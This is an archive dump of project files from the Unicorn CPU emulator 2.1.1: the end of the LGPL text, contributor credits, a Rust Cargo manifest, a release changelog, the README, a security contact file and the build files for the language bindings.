all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also compile or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. c) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. d) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307 USA. Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. , 1 April 1990 Ty Coon, President of Vice That's all there is to it! unicorn-2.1.1/CREDITS.TXT000066400000000000000000000042251467524106700147050ustar00rootroot00000000000000This file credits all the contributors of the Unicorn engine project. Key developers ============== Nguyen Anh Quynh Dang Hoang Vu Huitao Chen (chenhuitao) Ziqiao Kong (lazymio) KaiJernLau (xwings) Beta testers (in no particular order) ============================== Nguyen Tan Cong Loi Anh Tuan Edgar Barbosa Joxean Koret Chris Eagle Jay Little, Trail of Bits Jeong Wook Oh Luis Miras Yan Shoshitaishvili, Shellphish & UC Santa Barbara Erik Fischer Darel Griffin, NCC Group Anton Cherepanov Mohamed Saher (halsten) Tyler Colgan Jonathon Reinhart Blue Skeye Chris Maixner Sergi Alvarez, aka pancake (author of radare) Ryan Hileman Tim "diff" Strazzere WanderingGlitch of the Zero Day Initiative Sascha Schirra François Serman Sean Heelan Luke Burnett Parker Thompson Daniel Godas-Lopez Antonio "s4tan" Parata Corey Kallenberg Shift Gabriel Quadros Fabian Yamaguchi Ralf-Philipp Weinmann Mike Guidry Joshua "posixninja" Hill Contributors (in no particular order) ===================================== (Please let us know if you want to have your name here) Nguyen Tan Cong Loi Anh Tuan Shaun Wheelhouse: Homebrew package Kamil Rytarowski: Pkgsrc package Zak Escano: MSVC support. Chris Eagle: Java binding Ryan Hileman: Go binding Antonio Parata: .NET binding Jonathon Reinhart: C unit test Sascha Schirra: Ruby binding Adrian Herrera: Haskell binding practicalswift: Various cool bugs found by fuzzing farmdve: Memory leaking fix Andrew Dutcher: uc_context_{save, restore} API. Stephen Groat: improved CI setup. David Zimmer: VB6 binding. zhangwm: ARM & ARM64 big endian. Mohamed Osama: FreePascal/Delphi binding. Philippe Antoine (Catena cyber): fuzzing Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Cmake support Huitao Chen (chenhuitao) & KaiJern Lau (xwings): Python3 support for building Kevin Foo (chfl4gs): Travis-CI migration Simon Gorchakov: PowerPC target Stuart Dootson (studoot): MSVC compatibility with PowerPC target support Ziqiao Kong (lazymio): uc_context_free() API and various bug fix & improvement. Sven Almgren (blindmatrix): bug fix Chenxu Wu (kabeor): Documentation Philipp Takacs: virtual tlb, memory snapshots unicorn-2.1.1/Cargo.toml000066400000000000000000000025161467524106700151400ustar00rootroot00000000000000[package] name = "unicorn-engine" version = "2.1.1" authors = ["Ziqiao Kong", "Lukas Seidel"] documentation = "https://github.com/unicorn-engine/unicorn/wiki" edition = "2021" license = "GPL-2.0" readme = "README.md" repository = "https://github.com/unicorn-engine/unicorn" description = "Rust bindings for the Unicorn emulator with utility functions" build = "bindings/rust/build.rs" links = "unicorn" # use `cargo publish --list` to see files to be included # the resulting list what cargo uses to check for out-of-date files during build exclude = [ "/docs", "/bindings/dotnet", "/bindings/go", "/bindings/haskell", "/bindings/java", "/bindings/pascal", "/bindings/python", "/bindings/ruby", "/bindings/vb6", "/bindings/zig", "/samples", "/tests", ] [lib] path = "bindings/rust/src/lib.rs" [dependencies] bitflags = "2.3.3" libc = "0.2" [build-dependencies] cc = { version = "1.0" } cmake = { version = "0.1" } pkg-config = { version = "0.3" } [features] default = ["arch_all"] dynamic_linkage = [] arch_all = ["arch_x86", "arch_arm", "arch_aarch64", "arch_riscv", "arch_mips", "arch_sparc", "arch_m68k", "arch_ppc", "arch_s390x", "arch_tricore"] arch_x86 = [] arch_arm = [] arch_aarch64 = [] arch_riscv = [] arch_mips = [] arch_sparc = [] arch_m68k = [] arch_ppc = [] arch_s390x = [] arch_tricore = [] unicorn-2.1.1/ChangeLog000066400000000000000000000365211467524106700147650ustar00rootroot00000000000000This file details the changelog of Unicorn Engine. ------------------------------- [Version 2.1.1]: Sept 26th, 2024 This is a small release to fix a few urgent issues. - Remove pkg_resources usage - Fix wheels distribution for x86_64 macos - Fix redundant wheel hacks - Support musllinux distribution ------------------------------- [Version 2.1.0]: Sept 22nd, 2024 It has been a while since the last release, and 2.1.0 brings several exciting features. Below is the changelog from the latest to the oldest (though not strictly). Highlights - Revive QEMU logs, now we have `-DUNICORN_LOGGING=yes` to enable all qemu logs. @BitMaskMixer - Faster (up to 40x) write performance by not always doing `store_helper` and cleaning page locks. @tunz @boborjan2 - Brand new python bindings, with strongly typed and many improvements. @elicn - Fix to a long-standing MinGW random segfault bug. - We bring python2 compatibility back. - We now fully support M1, both building and a pre-built wheel. - We support snapshot memory now, with a very low overhead copy-on-write fashion. @PhilippTakacs - An option to bypass MMU is also added, check our FAQ. @PhilippTakacs - A brand new (and modern) java bindings. We are also working to publish it to maven. @nneonneo - We have zig integrated. @kassane @atipls - Now Unicorn no longer allocates 2GB memory for every instance. The memory will be only committed once used and the upper limit can be adjusted with `uc_ctl`. - New DotNet binding, with published to both Github and Nuget. @TSRBerry - The release will attach all binaries, thanks to @marameref Fixes & Improvements - RISCV improvements, but we still have a long way to go. @apparentlymart @ks0777 - cmake improvements @scribam @es3n1n - Various python bindings fix and improvements @bet4it @rhelmot - Docs. @gerph @BitMaskMixer - Rust bindings. @lockbox @mlgiraud @deadash - TCG backend fixes. @redoste @StalkR @dglynos - PPC32 fixes. @dotCirill - Haiku fixes. @kallisti5 - Improvements to avoid simulator detection. @mrexodia New Contributors * @ks0777 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1736 * @LG3696 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1764 * @PhilippTakacs made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1765 * @edsky made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1754 * @tunz made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1790 * @kassane made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1809 * @Xeonacid made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1807 * @nneonneo made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1830 * @lockbox made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1847 * @mlgiraud made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1849 * @basavesh made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1861 * @hamarituc made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1886 * @StalkR made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1907 * @dotCirill made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1910 * @marameref made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1897 * @redoste made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1922 * @xclusivor made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1929 * @elicn made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1629 * @nganhkhoa made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1942 * @es3n1n made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1960 * @BitMaskMixer made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1977 * @apparentlymart made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1995 * @atipls made their first contribution in https://github.com/unicorn-engine/unicorn/pull/1985 * @omer54463 made their first contribution in https://github.com/unicorn-engine/unicorn/pull/2005 Full Changelog: https://github.com/unicorn-engine/unicorn/compare/2.0.1...2.1.0 Again, thanks for all contributors and sorry if I missed your name here (please tell me @wtdcode !). 2.1.1 is also coming because we expect some minor break changes to fix. ------------------------------- [Version 2.0.1.post1]: Nov 22nd, 2022 This is a small release to complement the previous 2.0.1 release. Fix: - Fix the endianness detection in tests. - Fix the version number in CMakeLists.txt. ------------------------------- [Version 2.0.1]: Nov 1st, 2022 Unicorn2 makes the first step to [Debian packages](https://tracker.debian.org/pkg/unicorn-engine) and [vcpkg](https://github.com/microsoft/vcpkg/pull/26101)! Thanks @roehling and @LilyWangL ! Features: - Support building & running on BE hosts. #1710 - Fix and support `clang-cl` on Windows. #1687 - Fix python `sdist` and add aarch64 Linux wheels. Note `pip` can build Unicorn2 on M1 now! - C# binding is refined and upgraded to .Net 6. #1723 Fix/Improvements: - Various bindings improvements. #1723 - Improvements for tests. #1684 #1683 #1691 #1711 - Fail explicitly when VEX.L is set. #1658 - Fix endianness when writing PPC32 CR register. #1659 - Fix a bug in `uc_ctl_set_cpu_model` check. - Fix Tricore PC not updating. #1668 - Fix the mapping not updated if users modify the mappings in the hooks. - Handle pathological cases consistently. #1651 - Fix memory leaks in PPC target. #1680 - Fix memory leaks in Tricore target. #1681 - Fix MSVC handling in cmake. #1693 - Fix PC sync-ing problems for `UC_HOOK_BLOCK` hooks. - Fix PC sync-ed twice when users request a soft restart. - Prevent overflow with pre-allocated RAM blocks. #1712 - Add FPCR and FPSR registers #1722 - Fix ARM CPU state not deep copied. - Fix PC not sync-ed for memory operation on aarch64. - Exit invalid store operations early to avoid the target registers being overwritten. - Improve the support for ARM BE32. Thanks: @roehling @LilyWangL @mrexodia @zachriggle @Yu3H0 @rhelmot @relapids @sh4w1 @TSRBerry ------------------------------- [Version 2.0.0]: July 7th, 2022 Features: - TriCore Support (#1568) Fixes/Improvements: - Build both shared library and static archive as unicorn1 does. - Misc bindings improvements. #1569 #1600 #1609 #1613 #1616 - Make sure setjmp-setjmp-wrapper-win32 participates in the build. #1604 - Improve Rust bindings build logic. - Fix wrong python binding for UC_CTL_TB_REMOVE_CACHE - Flush translation blocks when the count hook is removed. - Fix unicorn crash when nested `uc_emu_start` deletes a hook - Fix CPU not fully resumed when writing PC. - Don't quit TB if `uc_mem_protect` doesn't change the protection of current TB memory. - Add type annotations for python bindings. - Add CPUID hook for python bindings. #1618 - Don't repeat memory hooks if there is already an unhandled error. #1618 - Support reads and writes over all Arm SIMD registers #1621 - Fix wrong registers range in python bindings. - Fix uc_mem_protect on mmio regions - Fix a UAF caused by hook cache. - Fix the value collision between UC_MODE_ARMBE8 and UC_MODE_ARM926 Thanks: @AfoHT @mrexodia @bet4it @lowlyw @ekilmer @ondryaso @QDucasse @PalumboN @uberwoozle ---------------------------------- [Version 2.0.0 rc7]: April 17, 2022 This release is expected to be the real last RC release of Unicorn2. ;) Features: - Correctly generate static archives for the static build and have CI auto-tested. - Rust bindings revised. #1584 - Compatible with clang-cl compiler. #1581 - Implement UC_HOOK_INSN for aarch64 MRS/MSR/SYS/SYSL Fixes/Improvements: - Several corner cases on our API. #1587 #1595 - Fix the codegen buffer leak. - Rust bindins improvements. #1574 #1575 - Add "holes" to allow unicorn lib as a drop-in replacement for older ones. #1572 - s390x backports. #1570 - Fix exits wrongly removed in nested uc_emu_start - Fix a possible endless loop for only one translation block in a multithreaded environment. - Fix wrong PC without `UC_HOOK_CODE` installed. - Update vb6 bindings license. #1563 - Fix buffer allocation failure on M1. #1559 - Fix wrong EFLAGS on startup. - Fix wrong internal states on nested uc_emu_start. - Remove armeb-softmmu and aarcheb-softmmu which are usermode targets. - Advance PPC32 PC. #1558 - Support UC_PPC_REG_CR. - Update CI to windows-2019 Thanks: @shuffle2 @liyansong2018 @rose4096 @nviennot @n1tram1 @iii-i @dzzie @yrashk @bet4it ---------------------------------- [Version 2.0.0 rc6]: Feburary 13, 2022 This release is expected to be the last RC release of Unicorn2. Features: - SystemZ (aka. s390x) support. #1521 #1547 - CPUID hook now may return a bool to indicate whether skipping the CPUID instruction. - ARM/AARCH64 coprocessor registers read/write support. #889 Fixes/Improvements: - Rust improvements. More registers enums #1504 Easier to use #1543 #1545 - M68k improvements. #1507 - Golang improvements. Enable `uc_ctl_set_model` #1506 - Unit tests improvements. #1512 - Various ARM system mode fixes. #1500 #1520 #1525 #1531 - Read/write arm FPSCR and FPSID. #1453 - Fix the support for ARMv8 - Fix a large number of memory leaks and unicorn2 now goes with google/oss-fuzz! - Add more X87 registers. #1524 - Add more PPC registers. - Fix the exception not cleared in python bindings. #1537 - Correctly support ARM big endian and drops `armeb-softmmu` and `aarch64eb-softmmu` - Fix ARM CPSR.E not reflected during runtime. - Resolve fuzzing speed problem on macOS. - Modernize CmakeFileLists.txt. #1544 - Fix an issue in nested `uc_emu_start` Thanks: @Kritzefitz @zznop @QDucasse @gerph @bet4it @mrexodia @iii-i @jbcayrou @scribam ---------------------------------- [Version 2.0.0 rc5]: November 25, 2021 This release fixes a few urgent bugs and improves performance. Fixes/Improvements: - Rust bindings improvements. #1480 #1483 - Allow R/W to cp15 registers. #1481 - Fix `UC_HOOK_EDGE_GENERATED` not calling for indirect jumps. - Python bindings build improvements. #1486 - Fix bindings on m1 macOS. - Support nested `uc_emu_start` calls without context save/restore - Fix wrong MMIO offset for 32bit targets. - Fix wrong `uc_mem_unmap` logic for both ram and mmio memory. - Inline `uc_trace_code` and PC sync to improve performance. - Various fixes in tests. - Allow writing to CPSR to switch bank registers. - Implement MMIO in rust bindings. #1499 Thanks: - @domenukk - @bet4it - @mid-kid - @Kritzefitz ---------------------------------- [Version 2.0.0 rc4]: November 09, 2021 This is a big release of Unicorn and introduces a few powerful new features and a bunch of fixes. New Features: - New API: uc_ctl, by which you could control CPU models, TB caches or multiple exits etc. - New Hook: UC_HOOK_EDGE_GENERATED, UC_HOOK_TCG_OPCODE - RISCV CSR read/write. - Support reading MIPS hi/lo regs. 7268c2a19bce2db72b90e3ea3b133482c3ff4e58 - OSS Fuzzing building support. - MSVC 32bit and Android build support. - Introduce clang-format. Fixes/Improvements: - Java bindings improvements. unicorn-engine/unicorn#1461 - API Documents updates. unicorn-engine/unicorn#1459 - Rust bindings improvements. unicorn-engine/unicorn#1462 - Add a go.mod for go bindings. - CMakeLists.txt improvements as a subproject. #1373 - Fix rust bindings build script and add CI. - Use binary search to find mappings. unicorn-engine/unicorn#1414 - RISCV: - Update pc when exiting execution. unicorn-engine/unicorn#1465 - Add RISCV control status registers to enable floating. unicorn-engine/unicorn#1469 unicorn-engine/unicorn#1478 - After `ecall`, pc not advanced. unicorn-engine/unicorn#1477 - Fix tb not invalidated when exiting. - Fix bindings makefile. - Fix uc_mem_protect not working. unicorn-engine/unicorn#1468 Thanks: - @bet4it - @kabeor - @chfl4gs - @QDucasse - @h33p - @geohot - @cla7aye15I4nd - @jcalabres ---------------------------------- [Version 2.0.0 rc3]: October 06, 2021 This is an urgent pre-release regarding python bindings on older Linux systems. - Support older Linux distribution, e.g. prior to Ubuntu 19.04 - Fix a memory leak in `uc_close` - Support building on Android - Support hooking CPUID instruction. Enjoy. ---------------------------------- [Version 2.0.0 rc2]: October 05, 2021 This is an urgent pre-release regarding the packaging problem of python bindings. - Set `zip_false` and `is_pure` to `False` to avoid issues on some Linux distributions. - Link to `libm` to make sure our libraries work. - Support to read ST registers in rust bindings. - Fix #1450 Enjoy. ---------------------------------- [Version 2.0.0 rc1]: October 04, 2021 Unicorn2 first release candidate! - Based on Qemu 5.0.1 - Remain backward compatible with Unicorn 1.x - Update ISA of all existing architectures - Support 2 new architectures in PowerPC & RISCV ---------------------------------- [Unicorn2-beta]: October 3rd, 2021 - Release Unicorn2 beta to public. - New logo to celebrate this important milestone! ---------------------------------- [Version 1.0.1]: April 20th, 2017 - Properly handle selected-architecture build. - Fix compilation issues on PPC & S390x. - Fix a memory leak on uc_mem_protect(). - ARM: - Support big-endian mode. - Correct instruction size of Thumb/Thumb2 code. - Support read/write APSR register. - ARM64: - Support read/write NEON registers. - Support read/write NZCV registers. - Mips: Support read/write Mips64 registers. - X86: Support read/write MSR. - Haskell binding: update to the latest API. - Python: allow not having PATH setup. ---------------------------------- [Version 1.0]: February 23rd, 2017 - Fix build script for BSD host. - Fix building Unicorn on Arm/PPC/Sparc/S390 hosts. - X86: - Fix 16bit address computation. - Fix initial state of segment registers. ---------------------------------- [Version 1.0-rc3]: January 25th, 2017 - Rename API uc_context_free() to uc_free(). - ARM: - uc_reg_write() now can modify CPSR register. - Add some ARM coproc registers. - ARM64: uc_reg_read|write() now handles W0-W31 registers. - Windows: fix a double free bug in uc_close(). - New VB6 binding. - Java: update to support new APIs from v1.0-rc1. - Python: - Fix memory leaking that prevents UC instances from being GC. - Remove some dependencies leftover from glib time. - Add new method mem_regions() (linked to uc_mem_regions() API) ---------------------------------- [Version 1.0-rc2]: January 4th, 2017 - Remove glib & pkconfig dependency. - Python: fix an issue to restore support for FreeBSD (and other *BSD Unix). - ARM: support MCLASS cpu (Cortex-M3). - Windows: export a static lib that can be used outside of Mingw ---------------------------------- [Version 1.0-rc1]: December 22nd, 2016 - Lots of bugfixes in all architectures. - Better support for ARM Thumb. - Fix many memory leaking issues. - New bindings: Haskell, MSVC. - Better support for Python3. - New APIs: uc_query, uc_reg_write_batch, uc_reg_read_batch, uc_mem_map_ptr, uc_mem_regions, uc_context_alloc, uc_context_save & uc_context_restore. - New memory hook type: UC_HOOK_MEM_READ_AFTER. - Add new version macros UC_VERSION_{MAJOR, MINOR, EXTRA} ---------------------------------- [Version 0.9]: October 15th, 2015 - Initial public release. unicorn-2.1.1/README.md000066400000000000000000000040671467524106700144720ustar00rootroot00000000000000Unicorn Engine ============== [![pypi downloads](https://pepy.tech/badge/unicorn)](https://pepy.tech/project/unicorn) [![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/unicorn.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:unicorn)

Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework, based on [QEMU](http://qemu.org). Unicorn offers some unparalleled features: - Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, PowerPC, RISCV, SPARC, S390X, TriCore and X86 (16, 32, 64-bit) - Clean/simple/lightweight/intuitive architecture-neutral API - Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, Lua and Zig. - Native support for Windows & *nix (with Mac OSX, Linux, Android, *BSD & Solaris confirmed) - High performance via Just-In-Time compilation - Support for fine-grained instrumentation at various levels - Thread-safety by design - Distributed under free software license GPLv2 Further information is available at http://www.unicorn-engine.org License ------- This project is released under the [GPL license](COPYING). Compilation & Docs ------------------ See [docs/COMPILE.md](docs/COMPILE.md) file for how to compile and install Unicorn. More documentation is available in [docs/README.md](docs/README.md). Contact ------- [Contact us](http://www.unicorn-engine.org/contact/) via mailing list, email or twitter for any questions. Contribute ---------- If you want to contribute, please pick up something from our [Github issues](https://github.com/unicorn-engine/unicorn/issues). We also maintain a list of more challenged problems in [milestones](https://github.com/unicorn-engine/unicorn/milestones) for our regular release. Please send pull request to our [dev branch](https://github.com/unicorn-engine/unicorn/tree/dev). [CREDITS.TXT](CREDITS.TXT) records important contributors of our project. unicorn-2.1.1/SECURITY.md000066400000000000000000000000511467524106700147710ustar00rootroot00000000000000aquynh -at- gmail.com mio -at- lazym.io unicorn-2.1.1/TODO000066400000000000000000000000751467524106700136760ustar00rootroot00000000000000Moved to https://github.com/unicorn-engine/unicorn/milestonesunicorn-2.1.1/bindings/000077500000000000000000000000001467524106700150015ustar00rootroot00000000000000unicorn-2.1.1/bindings/Makefile000066400000000000000000000023611467524106700164430ustar00rootroot00000000000000# Unicorn Engine # By Nguyen Anh Quynh & Dang Hoang Vu, 2015 DIFF = diff SAMPLE_SOURCE = $(wildcard ../samples/*.c) SAMPLE = $(SAMPLE_SOURCE:../samples/%.c=%) SAMPLE := $(SAMPLE:mem_apis=) SAMPLE := $(SAMPLE:sample_batch_reg=) SAMPLE := $(SAMPLE:sample_x86_32_gdt_and_seg_regs=) SAMPLE := $(SAMPLE:shellcode=) UNAME_S := $(shell uname -s) ifeq ($(UNAME_S), Linux) ENV_VARS = LD_PRELOAD=librt.so LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ else ENV_VARS = LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ LIBUNICORN_PATH=$(TRAVIS_BUILD_DIR) endif .PHONY: build install python c clean check test build: $(MAKE) -C python gen_const $(MAKE) -C go gen_const $(MAKE) -C java gen_const $(MAKE) -C ruby gen_const python3 const_generator.py dotnet python3 const_generator.py pascal python3 const_generator.py zig install: build $(MAKE) -C python install $(MAKE) -C java install test: $(SAMPLE:%=%.py.test) c: $(MAKE) -C ../samples python: $(MAKE) -C python %.c.txt: c $(ENV_VARS) ../samples/$(@:%.c.txt=%) > $@ %.py.txt: python $(ENV_VARS) python3 python/$(@:%.txt=%) > $@ %.py.test: %.c.txt %.py.txt $(DIFF) -u $(@:%.py.test=%.c.txt) $(@:%.py.test=%.py.txt) clean: # rm -rf *.txt $(MAKE) -C python clean $(MAKE) -C java clean check: make -C python check unicorn-2.1.1/bindings/README000066400000000000000000000025051467524106700156630ustar00rootroot00000000000000This directory contains bindings & test code for Python, Java, Go and .NET. See /README or /README.TXT or /README.md for how to install each binding. The following bindings are contributed by community. - Java binding: by Chris Eagle. - Go binding: by Ryan Hileman. - .NET binding: by Antonio Parata. - Ruby binding: by Sascha Schirra - Haskell binding: by Adrian Herrera. - VB6 binding: David Zimmer. - FreePascal/Delphi binding: Mohamed Osama. More bindings created & maintained externally by community are available as follows. - UnicornPascal: Delphi/Free Pascal binding (by Stievie). https://github.com/stievie/UnicornPascal - Unicorn-Rs: Rust binding (by Sébastien Duquette) https://github.com/ekse/unicorn-rs - UnicornEngine: Perl binding (by Vikas Naresh Kumar) https://metacpan.org/pod/UnicornEngine - Unicorn.CR: Crystal binding (by Benoit Côté-Jodoin) https://github.com/Becojo/unicorn.cr - 